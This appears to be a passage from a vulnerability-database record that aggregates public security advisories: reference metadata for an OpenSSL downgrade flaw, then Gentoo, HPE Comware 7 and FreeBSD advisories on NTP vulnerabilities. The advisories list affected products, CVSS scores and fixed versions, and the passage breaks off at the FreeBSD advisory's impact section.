"http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3571" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-0206" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-0205" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3569" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0207" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0118" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-8142" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0226" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0231" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3523" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0285" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-9653" }, { "trust": 0.1, "url": "http://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c04746490\u0026la" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-9705" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0232" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-1692" }, { "trust": 0.1, "url": "http://www.hp.com/go/insightupdates" }, { "trust": 0.1, "url": "https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay/?docid=emr" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-0248" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-9427" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0208" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0273" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-5107" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0231" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-9652" }, { "trust": 0.1, "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c04762744" }, { "trust": 0.1, "url": "https://www.openssl.org/about/releasestrat.html)," }, { "trust": 0.1, "url": "https://www.openssl.org/about/secpolicy.html" }, { "trust": 0.1, "url": "http://css.csail.mit.edu/6.858/2013/readings/rsa-bug-attacks.pdf" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-0204" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-0206" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-0205" }, { "trust": 0.1, "url": "https://access.redhat.com/articles/11258" }, { "trust": 0.1, "url": "https://access.redhat.com/security/team/contact/" }, { "trust": 0.1, "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce" }, { "trust": 0.1, "url": "https://bugzilla.redhat.com/):" }, { "trust": 0.1, "url": "https://access.redhat.com/security/updates/classification/#moderate" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2014-3571" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2014-3570" }, { "trust": 0.1, "url": "https://access.redhat.com/security/team/key/" } ], "sources": [ { "db": "VULMON", "id": "CVE-2014-3572" }, { "db": "BID", "id": "71942" }, { "db": "JVNDB", "id": "JVNDB-2014-007553" }, { "db": "PACKETSTORM", "id": "133317" }, { "db": "PACKETSTORM", "id": "130985" }, { "db": "PACKETSTORM", "id": "133316" }, { "db": "PACKETSTORM", "id": "130987" }, { "db": "PACKETSTORM", "id": "129870" }, { "db": "PACKETSTORM", "id": "133325" }, { "db": "PACKETSTORM", "id": "129867" }, { "db": "PACKETSTORM", "id": "130051" }, { "db": "NVD", "id": "CVE-2014-3572" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "VULMON", "id": "CVE-2014-3572" }, { "db": "BID", "id": "71942" }, { "db": "JVNDB", "id": "JVNDB-2014-007553" }, { "db": "PACKETSTORM", "id": "133317" }, { "db": "PACKETSTORM", "id": "130985" }, { "db": "PACKETSTORM", "id": "133316" }, { "db": "PACKETSTORM", "id": "130987" }, { "db": "PACKETSTORM", "id": "129870" }, { "db": "PACKETSTORM", "id": "133325" }, { "db": "PACKETSTORM", "id": "129867" }, { "db": "PACKETSTORM", "id": "130051" }, { "db": "NVD", "id": "CVE-2014-3572" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2015-01-09T00:00:00", "db": "VULMON", "id": "CVE-2014-3572" }, { "date": "2015-01-08T00:00:00", "db": "BID", "id": "71942" }, { "date": "2015-01-13T00:00:00", "db": "JVNDB", "id": "JVNDB-2014-007553" }, { "date": "2015-08-26T01:33:18", "db": "PACKETSTORM", "id": "133317" }, { "date": "2015-03-24T17:03:36", "db": "PACKETSTORM", "id": "130985" }, { "date": "2015-08-26T01:33:07", "db": "PACKETSTORM", "id": "133316" }, { "date": "2015-03-24T17:05:09", "db": "PACKETSTORM", "id": "130987" }, { "date": "2015-01-09T17:43:35", "db": "PACKETSTORM", "id": "129870" }, { "date": "2015-08-26T01:35:08", "db": "PACKETSTORM", "id": "133325" }, { "date": "2015-01-09T02:01:10", "db": "PACKETSTORM", "id": "129867" }, { "date": "2015-01-22T01:35:41", "db": "PACKETSTORM", "id": "130051" }, { "date": "2015-01-09T02:59:02.320000", "db": "NVD", "id": "CVE-2014-3572" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2017-11-15T00:00:00", "db": "VULMON", "id": "CVE-2014-3572" }, { "date": "2017-01-23T00:09:00", "db": "BID", "id": "71942" }, { "date": "2016-08-09T00:00:00", "db": "JVNDB", "id": "JVNDB-2014-007553" }, { "date": "2017-11-15T02:29:05.313000", "db": "NVD", "id": "CVE-2014-3572" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "network", "sources": [ { "db": "BID", "id": "71942" } ], "trust": 0.3 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "OpenSSL of s3_clnt.c Inside ssl3_get_key_exchange In function ECDHE-to-ECDH Vulnerabilities that are subject to downgrade attacks", "sources": [ { "db": "JVNDB", "id": "JVNDB-2014-007553" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Design Error", "sources": [ { "db": "BID", "id": "71942" } ], "trust": 0.3 } }
var-201708-0038
Vulnerability from variot
The decodenetnum function in ntpd in NTP 4.2.x before 4.2.8p4, and 4.3.x before 4.3.77 allows remote attackers to cause a denial of service (assertion failure) via a 6 or mode 7 packet containing a long data value. NTP Is vulnerable to input validation.Denial of service (DoS) It may be put into a state. Network Time Protocol is prone to a denial-of-service vulnerability. A remote attacker may exploit this issue to cause a denial-of-service condition, denying service to legitimate users.
Gentoo Linux Security Advisory GLSA 201607-15
https://security.gentoo.org/
Severity: Normal Title: NTP: Multiple vulnerabilities Date: July 20, 2016 Bugs: #563774, #572452, #581528, #584954 ID: 201607-15
Synopsis
Multiple vulnerabilities have been found in NTP, the worst of which could lead to Denial of Service.
Affected packages
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 net-misc/ntp < 4.2.8_p8 >= 4.2.8_p8
Description
Multiple vulnerabilities have been discovered in NTP. Please review the CVE identifiers referenced below for details.
Resolution
All NTP users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot --verbose ">=net-misc/ntp-4.2.8_p8"
References
[ 1 ] CVE-2015-7691 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7691 [ 2 ] CVE-2015-7692 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7692 [ 3 ] CVE-2015-7701 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7701 [ 4 ] CVE-2015-7702 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7702 [ 5 ] CVE-2015-7703 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7703 [ 6 ] CVE-2015-7704 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7704 [ 7 ] CVE-2015-7705 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7705 [ 8 ] CVE-2015-7848 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7848 [ 9 ] CVE-2015-7849 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7849 [ 10 ] CVE-2015-7850 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7850 [ 11 ] CVE-2015-7851 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7851 [ 12 ] CVE-2015-7852 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7852 [ 13 ] CVE-2015-7853 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7853 [ 14 ] CVE-2015-7854 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7854 [ 15 ] CVE-2015-7855 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7855 [ 16 ] CVE-2015-7871 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7871 [ 17 ] CVE-2015-7973 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7973 [ 18 ] CVE-2015-7974 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7974 [ 19 ] CVE-2015-7975 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7975 [ 20 ] CVE-2015-7976 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7976 [ 21 ] CVE-2015-7977 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7977 [ 22 ] CVE-2015-7978 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7978 [ 23 ] CVE-2015-7979 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7979 [ 24 ] CVE-2015-8138 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8138 [ 25 ] CVE-2015-8139 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8139 [ 26 ] CVE-2015-8140 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8140 [ 27 ] CVE-2015-8158 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8158 [ 28 ] CVE-2016-1547 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1547 [ 29 ] CVE-2016-1548 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1548 [ 30 ] CVE-2016-1549 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1549 [ 31 ] CVE-2016-1550 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1550 [ 32 ] CVE-2016-1551 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1551 [ 33 ] CVE-2016-2516 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2516 [ 34 ] CVE-2016-2517 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2517 [ 35 ] CVE-2016-2518 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2518 [ 36 ] CVE-2016-2519 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2519 [ 37 ] CVE-2016-4953 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4953 [ 38 ] CVE-2016-4954 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4954 [ 39 ] CVE-2016-4955 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4955 [ 40 ] CVE-2016-4956 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4956 [ 41 ] CVE-2016-4957 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4957
Availability
This GLSA and any updates to it are available for viewing at the Gentoo Security Website:
https://security.gentoo.org/glsa/201607-15
Concerns?
Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.
License
Copyright 2016 Gentoo Foundation, Inc; referenced text belongs to its owner(s).
The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
.
Release Date: 2016-09-21 Last Updated: 2016-09-21
Potential Security Impact: Multiple Remote Vulnerabilities
Source: Hewlett Packard Enterprise, Product Security Response Team
VULNERABILITY SUMMARY Potential security vulnerabilities in NTP have been addressed with HPE Comware 7 (CW7) network products.
References:
- CVE-2015-7704
- CVE-2015-7705
- CVE-2015-7855
- CVE-2015-7871
- PSRT110228
- SSRT102943
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. - Comware 7 (CW7) Products - Please refer to the RESOLUTION below for a list of impacted products. All product versions are impacted prior to the fixed versions listed.
BACKGROUND
CVSS Base Metrics ================= Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector
CVE-2015-7704
6.5 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L
6.4 (AV:N/AC:L/Au:N/C:N/I:P/A:P)
CVE-2015-7705
6.5 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L
6.4 (AV:N/AC:L/Au:N/C:N/I:P/A:P)
CVE-2015-7855
6.5 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L
6.4 (AV:N/AC:L/Au:N/C:N/I:P/A:P)
CVE-2015-7871
5.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
5.0 (AV:N/AC:L/Au:N/C:N/I:P/A:N)
Information on CVSS is documented in
HPE Customer Notice HPSN-2008-002 here:
https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c01345499
RESOLUTION HPE has released the following software updates to resolve the vulnerabilities in HPE Comware 7 network products.
COMWARE 7 Products
- 12500 (Comware 7) - Version: R7377
- HP Network Products
- JC072B HP 12500 Main Processing Unit
- JC085A HP A12518 Switch Chassis
- JC086A HP A12508 Switch Chassis
- JC652A HP 12508 DC Switch Chassis
- JC653A HP 12518 DC Switch Chassis
- JC654A HP 12504 AC Switch Chassis
- JC655A HP 12504 DC Switch Chassis
- JF430A HP A12518 Switch Chassis
- JF430B HP 12518 Switch Chassis
- JF430C HP 12518 AC Switch Chassis
- JF431A HP A12508 Switch Chassis
- JF431B HP 12508 Switch Chassis
- JF431C HP 12508 AC Switch Chassis
- JG497A HP 12500 MPU w/Comware V7 OS
- JG782A HP FF 12508E AC Switch Chassis
- JG783A HP FF 12508E DC Switch Chassis
- JG784A HP FF 12518E AC Switch Chassis
- JG785A HP FF 12518E DC Switch Chassis
- JG802A HP FF 12500E MPU
- 10500 (Comware 7) - Version: R7178
- HP Network Products
- JC611A HP 10508-V Switch Chassis
- JC612A HP 10508 Switch Chassis
- JC613A HP 10504 Switch Chassis
- JC748A HP 10512 Switch Chassis
- JG608A HP FlexFabric 11908-V Switch Chassis
- JG609A HP FlexFabric 11900 Main Processing Unit
- JG820A HP 10504 TAA Switch Chassis
- JG821A HP 10508 TAA Switch Chassis
- JG822A HP 10508-V TAA Switch Chassis
- JG823A HP 10512 TAA Switch Chassis
- JG496A HP 10500 Type A MPU w/Comware v7 OS
- JH198A HP 10500 Type D Main Processing Unit with Comware v7 Operating System
- JH206A HP 10500 Type D TAA-compliant with Comware v7 Operating System Main Processing Unit
- 12900 (Comware 7) - Version: R1138P03
- HP Network Products
- JG619A HP FlexFabric 12910 Switch AC Chassis
- JG621A HP FlexFabric 12910 Main Processing Unit
- JG632A HP FlexFabric 12916 Switch AC Chassis
- JG634A HP FlexFabric 12916 Main Processing Unit
- JH104A HP FlexFabric 12900E Main Processing Unit
- JH114A HP FlexFabric 12910 TAA-compliant Main Processing Unit
- JH263A HP FlexFabric 12904E Main Processing Unit
- JH255A HP FlexFabric 12908E Switch Chassis
- JH262A HP FlexFabric 12904E Switch Chassis
- JH113A HP FlexFabric 12910 TAA-compliant Switch AC Chassis
- JH103A HP FlexFabric 12916E Switch Chassis
- 5900 (Comware 7) - Version: R2422P02
- HP Network Products
- JC772A HP 5900AF-48XG-4QSFP+ Switch
- JG296A HP 5920AF-24XG Switch
- JG336A HP 5900AF-48XGT-4QSFP+ Switch
- JG510A HP 5900AF-48G-4XG-2QSFP+ Switch
- JG554A HP 5900AF-48XG-4QSFP+ TAA Switch
- JG555A HP 5920AF-24XG TAA Switch
- JG838A HP FF 5900CP-48XG-4QSFP+ Switch
- JH036A HP FlexFabric 5900CP 48XG 4QSFP+ TAA-Compliant
- JH037A HP 5900AF 48XGT 4QSFP+ TAA-Compliant Switch
- JH038A HP 5900AF 48G 4XG 2QSFP+ TAA-Compliant
- MSR1000 (Comware 7) - Version: R0305P08
- HP Network Products
- JG875A HP MSR1002-4 AC Router
- JH060A HP MSR1003-8S AC Router
- MSR2000 (Comware 7) - Version: R0305P08
- HP Network Products
- JG411A HP MSR2003 AC Router
- JG734A HP MSR2004-24 AC Router
- JG735A HP MSR2004-48 Router
- JG866A HP MSR2003 TAA-compliant AC Router
- MSR3000 (Comware 7) - Version: R0305P08
- HP Network Products
- JG404A HP MSR3064 Router
- JG405A HP MSR3044 Router
- JG406A HP MSR3024 AC Router
- JG407A HP MSR3024 DC Router
- JG408A HP MSR3024 PoE Router
- JG409A HP MSR3012 AC Router
- JG410A HP MSR3012 DC Router
- JG861A HP MSR3024 TAA-compliant AC Router
- MSR4000 (Comware 7) - Version: R0305P08
- HP Network Products
- JG402A HP MSR4080 Router Chassis
- JG403A HP MSR4060 Router Chassis
- JG412A HP MSR4000 MPU-100 Main Processing Unit
- JG869A HP MSR4000 TAA-compliant MPU-100 Main Processing Unit
- VSR (Comware 7) - Version: E0322
- HP Network Products
- JG810AAE HP VSR1001 Virtual Services Router 60 Day Evaluation Software
- JG811AAE HP VSR1001 Comware 7 Virtual Services Router
- JG812AAE HP VSR1004 Comware 7 Virtual Services Router
- JG813AAE HP VSR1008 Comware 7 Virtual Services Router
- 7900 (Comware 7) - Version: R2138P03
- HP Network Products
- JG682A HP FlexFabric 7904 Switch Chassis
- JG841A HP FlexFabric 7910 Switch Chassis
- JG842A HP FlexFabric 7910 7.2Tbps Fabric / Main Processing Unit
- JH001A HP FlexFabric 7910 2.4Tbps Fabric / Main Processing Unit
- JH122A HP FlexFabric 7904 TAA-compliant Switch Chassis
- JH123A HP FlexFabric 7910 TAA-compliant Switch Chassis
- JH124A HP FlexFabric 7910 7.2Tbps TAA-compliant Fabric/Main Processing Unit
- JH125A HP FlexFabric 7910 2.4Tbps TAA-compliant Fabric/Main Processing Unit
- 5130 (Comware 7) - Version: R3111P03
- HP Network Products
- JG932A HP 5130-24G-4SFP+ EI Switch
- JG933A HP 5130-24G-SFP-4SFP+ EI Switch
- JG934A HP 5130-48G-4SFP+ EI Switch
- JG936A HP 5130-24G-PoE+-4SFP+ (370W) EI Switch
- JG937A HP 5130-48G-PoE+-4SFP+ (370W) EI Switch
- JG938A HP 5130-24G-2SFP+-2XGT EI Switch
- JG939A HP 5130-48G-2SFP+-2XGT EI Switch
- JG940A HP 5130-24G-PoE+-2SFP+-2XGT (370W) EI Switch
- JG941A HP 5130-48G-PoE+-2SFP+-2XGT (370W) EI Switch
- JG975A HP 5130-24G-4SFP+ EI Brazil Switch
- JG976A HP 5130-48G-4SFP+ EI Brazil Switch
- JG977A HP 5130-24G-PoE+-4SFP+ (370W) EI Brazil Switch
- JG978A HP 5130-48G-PoE+-4SFP+ (370W) EI Brazil Switch
- 5700 (Comware 7) - Version: R2422P02
- HP Network Products
- JG894A HP FlexFabric 5700-48G-4XG-2QSFP+ Switch
- JG895A HP FlexFabric 5700-48G-4XG-2QSFP+ TAA-compliant Switch
- JG896A HP FlexFabric 5700-40XG-2QSFP+ Switch
- JG897A HP FlexFabric 5700-40XG-2QSFP+ TAA-compliant Switch
- JG898A HP FlexFabric 5700-32XGT-8XG-2QSFP+ Switch
- JG899A HP FlexFabric 5700-32XGT-8XG-2QSFP+ TAA-compliant Switch
- 5930 (Comware 7) - Version: R2422P02
- HP Network Products
- JG726A HP FlexFabric 5930 32QSFP+ Switch
- JG727A HP FlexFabric 5930 32QSFP+ TAA-compliant Switch
- JH178A HP FlexFabric 5930 2QSFP+ 2-slot Switch
- JH179A HP FlexFabric 5930 4-slot Switch
- JH187A HP FlexFabric 5930 2QSFP+ 2-slot TAA-compliant Switch
- JH188A HP FlexFabric 5930 4-slot TAA-compliant Switch
- HSR6600 (Comware 7) - Version: R7103P07
- HP Network Products
- JG353A HP HSR6602-G Router
- JG354A HP HSR6602-XG Router
- JG776A HP HSR6602-G TAA-compliant Router
- JG777A HP HSR6602-XG TAA-compliant Router
- HSR6800 (Comware 7) - Version: R7103P07
- HP Network Products
- JG361A HP HSR6802 Router Chassis
- JG361B HP HSR6802 Router Chassis
- JG362A HP HSR6804 Router Chassis
- JG362B HP HSR6804 Router Chassis
- JG363A HP HSR6808 Router Chassis
- JG363B HP HSR6808 Router Chassis
- JG364A HP HSR6800 RSE-X2 Router Main Processing Unit
- JG779A HP HSR6800 RSE-X2 Router TAA-compliant Main Processing
- JH075A HP HSR6800 RSE-X3 Router Main Processing Unit
- 1950 (Comware 7) - Version: R3111P03
- HP Network Products
- JG960A HP 1950-24G-4XG Switch
- JG961A HP 1950-48G-2SFP+-2XGT Switch
- JG962A HP 1950-24G-2SFP+-2XGT-PoE+(370W) Switch
- JG963A HP 1950-48G-2SFP+-2XGT-PoE+(370W) Switch
- 7500 (Comware 7) - Version: R7178
- HP Network Products
- JD238C HP 7510 Switch Chassis
- JD239C HP 7506 Switch Chassis
- JD240C HP 7503 Switch Chassis
- JD242C HP 7502 Switch Chassis
- JH207A HP 7500 1.2Tbps Fabric with 2-port 40GbE QSFP+ for IRF-Only Main Processing Unit
- JH208A HP 7502 Main Processing Unit
- JH209A HP 7500 2.4Tbps Fabric with 8-port 1/10GbE SFP+ and 2-port 40GbE QSFP+ Main Processing Unit
- 5130HI - Version: R1118P02
- HP Network Products
- JH323A HPE 5130 24G 4SFP+ 1-slot HI Switch
- JH324A HPE 5130 48G 4SFP+ 1-slot HI Switch
- JH325A HPE 5130 24G PoE+ 4SFP+ 1-slot HI Switch
- JH326A HPE 5130 48G PoE+ 4SFP+ 1-slot HI Switch
- 5510HI - Version: R1118P02
- HP Network Products
- JH145A HPE 5510 24G 4SFP+ HI 1-slot Switch
- JH146A HPE 5510 48G 4SFP+ HI 1-slot Switch
- JH147A HPE 5510 24G PoE+ 4SFP+ HI 1-slot Switch
- JH148A HPE 5510 48G PoE+ 4SFP+ HI 1-slot Switch
- JH149A HPE 5510 24G SFP 4SFP+ HI 1-slot Switch
Note: Please contact HPE Technical Support if any assistance is needed acquiring the software updates.
HISTORY Version:1 (rev.1) - 21 September 2016 Initial release
Third Party Security Patches: Third party security patches that are to be installed on systems running Hewlett Packard Enterprise (HPE) software products should be applied in accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HPE Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hpe.com.
Report: To report a potential security vulnerability for any HPE supported product: Web form: https://www.hpe.com/info/report-security-vulnerability Email: security-alert@hpe.com
Subscribe: To initiate a subscription to receive future HPE Security Bulletin alerts via Email: http://www.hpe.com/support/Subscriber_Choice
Security Bulletin Archive: A list of recently released Security Bulletins is available here: http://www.hpe.com/support/Security_Bulletin_Archive
Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB.
3C = 3COM 3P = 3rd Party Software GN = HPE General Software HF = HPE Hardware and Firmware MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PV = ProCurve ST = Storage Software UX = HP-UX
Copyright 2016 Hewlett Packard Enterprise
Hewlett Packard Enterprise shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett Packard Enterprise and the names of Hewlett Packard Enterprise products referenced herein are trademarks of Hewlett Packard Enterprise in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
============================================================================= FreeBSD-SA-15:25.ntp Security Advisory The FreeBSD Project
Topic: Multiple vulnerabilities of ntp
Category: contrib Module: ntp Announced: 2015-10-26 Credits: Network Time Foundation Affects: All supported versions of FreeBSD. Corrected: 2015-10-26 11:35:40 UTC (stable/10, 10.2-STABLE) 2015-10-26 11:36:55 UTC (releng/10.2, 10.2-RELEASE-p6) 2015-10-26 11:37:31 UTC (releng/10.1, 10.1-RELEASE-p23) 2015-10-26 11:36:40 UTC (stable/9, 9.3-STABLE) 2015-10-26 11:42:25 UTC (releng/9.3, 9.3-RELEASE-p29) CVE Name: CVE-2015-7701, CVE-2015-7702, CVE-2015-7703, CVE-2015-7704, CVE-2015-7848, CVE-2015-7849, CVE-2015-7850, CVE-2015-7851, CVE-2015-7852, CVE-2015-7853, CVE-2015-7854, CVE-2015-7855, CVE-2015-7871
For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit https://security.FreeBSD.org/.
I.
II. Problem Description
Crypto-NAK packets can be used to cause ntpd(8) to accept time from an unauthenticated ephemeral symmetric peer by bypassing the authentication required to mobilize peer associations. [CVE-2015-7871] FreeBSD 9.3 and 10.1 are not affected. [CVE-2015-7855]
If ntpd(8) is configured to allow remote configuration, and if the (possibly spoofed) source IP address is allowed to send remote configuration requests, and if the attacker knows the remote configuration password or if ntpd(8) was configured to disable authentication, then an attacker can send a set of packets to ntpd(8) that may cause it to crash, with the hypothetical possibility of a small code injection. [CVE-2015-7854]
A negative value for the datalen parameter will overflow a data buffer. NTF's ntpd(8) driver implementations always set this value to 0 and are therefore not vulnerable to this weakness. If you are running a custom refclock driver in ntpd(8) and that driver supplies a negative value for datalen (no custom driver of even minimal competence would do this) then ntpd would overflow a data buffer. It is even hypothetically possible in this case that instead of simply crashing ntpd the attacker could effect a code injection attack. [CVE-2015-7853]
If an attacker can figure out the precise moment that ntpq(8) is listening for data and the port number it is listening on or if the attacker can provide a malicious instance ntpd(8) that victims will connect to then an attacker can send a set of crafted mode 6 response packets that, if received by ntpq(8), can cause ntpq(8) to crash. [CVE-2015-7852]
If ntpd(8) is configured to allow remote configuration, and if the (possibly spoofed) IP address is allowed to send remote configuration requests, and if the attacker knows the remote configuration password or if ntpd(8) was configured to disable authentication, then an attacker can send a set of packets to ntpd that may cause ntpd(8) to overwrite files. [CVE-2015-7851]. The default configuration of ntpd(8) within FreeBSD does not allow remote configuration.
If ntpd(8) is configured to allow remote configuration, and if the (possibly spoofed) source IP address is allowed to send remote configuration requests, and if the attacker knows the remote configuration password or if ntpd(8) was configured to disable authentication, then an attacker can send a set of packets to ntpd that will cause it to crash and/or create a potentially huge log file. Specifically, the attacker could enable extended logging, point the key file at the log file, and cause what amounts to an infinite loop. [CVE-2015-7850]. The default configuration of ntpd(8) within FreeBSD does not allow remote configuration.
If ntpd(8) is configured to allow remote configuration, and if the (possibly spoofed) source IP address is allowed to send remote configuration requests, and if the attacker knows the remote configuration password or if ntpd was configured to disable authentication, then an attacker can send a set of packets to ntpd that may cause a crash or theoretically perform a code injection attack. [CVE-2015-7849]. The default configuration of ntpd(8) within FreeBSD does not allow remote configuration.
If ntpd(8) is configured to enable mode 7 packets, and if the use of mode 7 packets is not properly protected thru the use of the available mode 7 authentication and restriction mechanisms, and if the (possibly spoofed) source IP address is allowed to send mode 7 queries, then an attacker can send a crafted packet to ntpd that will cause it to crash. [CVE-2015-7848]. The default configuration of ntpd(8) within FreeBSD does not allow mode 7 packets.
If ntpd(8) is configured to use autokey, then an attacker can send packets to ntpd that will, after several days of ongoing attack, cause it to run out of memory. [CVE-2015-7701]. The default configuration of ntpd(8) within FreeBSD does not use autokey.
If ntpd(8) is configured to allow for remote configuration, and if the (possibly spoofed) source IP address is allowed to send remote configuration requests, and if the attacker knows the remote configuration password, it's possible for an attacker to use the "pidfile" or "driftfile" directives to potentially overwrite other files. [CVE-2015-5196]. The default configuration of ntpd(8) within FreeBSD does not allow remote configuration
An ntpd(8) client that honors Kiss-of-Death responses will honor KoD messages that have been forged by an attacker, causing it to delay or stop querying its servers for time updates. Also, an attacker can forge packets that claim to be from the target and send them to servers often enough that a server that implements KoD rate limiting will send the target machine a KoD response to attempt to reduce the rate of incoming packets, or it may also trigger a firewall block at the server for packets from the target machine. For either of these attacks to succeed, the attacker must know what servers the target is communicating with. An attacker can be anywhere on the Internet and can frequently learn the identity of the target's time source by sending the target a time query. [CVE-2015-7704]
The fix for CVE-2014-9750 was incomplete in that there were certain code paths where a packet with particular autokey operations that contained malicious data was not always being completely validated. Receipt of these packets can cause ntpd to crash. [CVE-2015-7702]. The default configuration of ntpd(8) within FreeBSD does not use autokey.
III. Impact
